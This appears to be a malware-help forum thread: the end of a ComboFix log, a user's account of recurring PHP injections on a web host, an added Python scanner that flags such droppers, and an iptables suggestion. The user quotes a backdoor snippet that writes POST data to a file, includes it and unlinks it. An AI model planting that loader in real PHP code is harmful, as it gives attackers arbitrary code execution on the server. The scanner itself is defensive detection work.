2014-03-11 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-29 20:56]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2010-10-17 07:05]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000Core.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
2014-03-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1813854299-3317763919-3206033757-1000UA.job
- c:\users\Chris\AppData\Local\Google\Update\GoogleUpdate.exe [2012-07-01 12:20]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
TCP: DhcpNameServer = 10.1.1.1
TCP: Interfaces\{9E575FD1-707C-49A4-AB7B-3B52A7908E9D}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{A8669315-9D96-4AC1-8C0E-A8D09B1F0C75}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D42CB96A-3720-412A-B8B3-1D254475ABC4}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{D87D39B8-7A27-4D89-A4A0-DA761B812D05}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2364279-D312-4EF1-AE1C-683CB479397F}: NameServer = 198.142.0.51 61.88.88.88
TCP: Interfaces\{E2A95CE3-6580-4E6C-BA15-81E9DDF11D1B}: NameServer = 198.142.0.51 61.88.88.88
FF - ProfilePath - c:\users\Chris\AppData\Roaming\Mozilla\Firefox\Profiles\sclbjaf5.default\
FF - prefs.js: browser.startup.homepage - about:newtab
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SepMasterService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\ccSvcHst.exe\" /s \"Symantec Endpoint Protection\" /m \"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\sms.dll\" /prefetch:1"
--
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SmcService]
"ImagePath"="\"c:\program files\Symantec\Symantec Endpoint Protection\12.1.4013.4013.105\Bin\Smc.exe\" /prefetch:1"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:61,9a,4c,64,7b,f9,ce,01
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ ]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*5mõ \OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.*5mõ ]
"0"=hex:47,3a,5c,55,74,69,6c,69,74,69,65,73,5c,4d,79,20,4d,75,73,69,63,5c,4d,
52,20,4d,49,53,54,45,52,20,2d,20,4b,79,72,69,65,2e,6d,70,33,00,00,72,69,65,\
"MRUListEx"=hex:00,00,00,00,ff,ff,ff,ff
.
[HKEY_USERS\S-1-5-21-1813854299-3317763919-3206033757-1000\Software\SecuROM\License information*]
"datasecu"=hex:cb,b2,e6,c1,5d,39,51,5d,a1,bf,98,4a,8c,02,6c,e9,6c,55,9e,d4,b5,
ff,c0,55,f7,0d,cc,84,12,67,d9,81,a4,06,5e,7d,8a,d4,04,1f,82,a9,43,63,c4,2a,\
"rkeysecu"=hex:8f,82,27,2c,f0,1a,6a,7d,ee,8c,0e,e4,ff,c7,55,6b
.
Completion time: 2014-03-12 08:27:49
ComboFix-quarantined-files.txt 2014-03-11 21:27
ComboFix2.txt 2014-03-11 03:48
ComboFix3.txt 2014-03-11 02:35
ComboFix4.txt 2014-03-11 02:07
.
Pre-Run: 36,486,361,088 bytes free
Post-Run: 36,417,896,448 bytes free
.
- - End Of File - - 3DCD870F880FE066FC9680C4A584502B
A36C5E4F47E84449FF07ED3517B43A31
 
log looks good. Can you better advise on why you think you are being followed/hacked?
 
log looks good. Can you better advise on why you think you are being followed/hacked?

Difficult to say.

There were no problems on the local host, with Symantec, Malwarebytes, rootkit killers and Search and Destroy all giving me a clean bill of health, as reported earlier.

On the remote (Apache) server I would delete PHP files, and they would reappear after a time on different addon domains. They would inject calls to their PHP files into my index.php files, and on it would go.

I would end up with repeatedly appearing files like __1bphwxLQ.php and 7wIvpUDn.php, and you would get stuff like this in the files:

// Drop-execute-delete chain: decoded POST data is written to a PHP file, include_once runs it, unlink removes it.
// $mpath and $fnsdht come from elsewhere in the injected code and are not shown in the post.
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
    @include_once($mpath."dsadasdsa1fag1.php");
    @unlink($mpath."dsadasdsa1fag1.php");
}

all hijacking to some other site, or mass mailing, or attacking other sites. My hosting account was suspended until I cleaned it all up, not once, but many times.

I cleaned up the remote site, and after repeated attacks like the above, I migrated to a new server with new passwords. After about two days, all that stuff (above) began to reappear again. That was when I thought the cause was a locally hosted port listener or something ... listening for port 21, or whatever port I used (I put port forwarding in to get away from port 21), and it all began to reappear and hijack domains, again and again.

My hosting account on a new server was suspended!

I suspect the registry keys with

@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000

were the culprit. I sincerely hope so.

Your thoughts?
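As an added example (not code from this thread, nor from any of the tools mentioned in it), here is a triage script a host admin could run over a document root to find the two things the poster describes: PHP files carrying the write-include-unlink dropper chain fed from request data, and include calls pointing at random-named PHP files injected into index.php. The sample files, the filename-entropy threshold and the name-shape regex are all constructed assumptions for this demonstration.

```python
import math
import os
import re
import tempfile
from collections import Counter
# One regex per stage of the drop-execute-delete chain quoted in the post.
STAGES = {
    "input":   re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "write":   re.compile(r"\bfile_put_contents\s*\(", re.I),
    "execute": re.compile(r"\b(?:include|require)(?:_once)?\s*\(", re.I),
    "delete":  re.compile(r"\bunlink\s*\(", re.I),
}
INCLUDE_LITERAL = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]", re.I)
RANDOM_STEM = re.compile(r"^_*[A-Za-z0-9]{6,12}$")  # shape of __1bphwxLQ / 7wIvpUDn (assumed)

def dropper_stages(source: str) -> set:
    """Chain stages present in the source; all four together is the pattern from the post."""
    return {name for name, pat in STAGES.items() if pat.search(source)}

def name_entropy(text: str) -> float:
    """Shannon entropy in bits per character; a random 8-char stem scores close to 3.0."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def looks_random(filename: str) -> bool:
    """Triage heuristic (threshold is an assumption): short alnum stem, mixed case, high entropy."""
    stem, ext = os.path.splitext(os.path.basename(filename))
    if ext.lower() != ".php" or not RANDOM_STEM.match(stem):
        return False
    core = stem.lstrip("_")
    # mixed case means neither all-lower nor all-upper
    return core.lower() != core != core.upper() and name_entropy(core) >= 2.75

def assess_php(filename: str, source: str) -> list:
    """Reasons a PHP file deserves a look; an empty list means nothing tripped."""
    reasons = []
    if dropper_stages(source) == set(STAGES):
        reasons.append("write-include-unlink dropper chain fed from request data")
    if looks_random(filename):
        reasons.append("random-looking filename")
    for target in INCLUDE_LITERAL.findall(source):
        if looks_random(target):
            reasons.append("includes random-looking file " + os.path.basename(target))
    return reasons

def scan_webroot(root: str) -> dict:
    """Walk a document root; return {relative_path: reasons} for every flagged .php file."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                reasons = assess_php(fn, fh.read())
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings

def build_sample_webroot() -> str:
    """Constructed sample tree, not real site content: two infected files, two benign ones."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "__1bphwxLQ.php": '<?php if(@file_put_contents($p."d.php","<?php\\n".$f($_POST["k"])."\\n?>")){'
                          '@include_once($p."d.php");@unlink($p."d.php");} ?>',
        "index.php": "<?php include_once('7wIvpUDn.php'); ?>\n<html><body>Welcome</body></html>\n",
        "contact.php": '<?php if (isset($_POST["email"])) { mail($to, "Contact", $_POST["msg"]); } ?>',
        "cache.php": "<?php file_put_contents($cache, serialize($rows)); unlink($cache . '.old'); ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `scan_webroot(build_sample_webroot())` to see that only the dropper and the patched index.php are flagged, while the contact form (request data, no drop chain) and the cache writer (write and unlink, no include) are left alone.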
 
Can you use iptables in your server to prevent hackers from gaining entry? I have a built in SSH server in the router and use iptables to prevent bruteforcing the port and other things.
 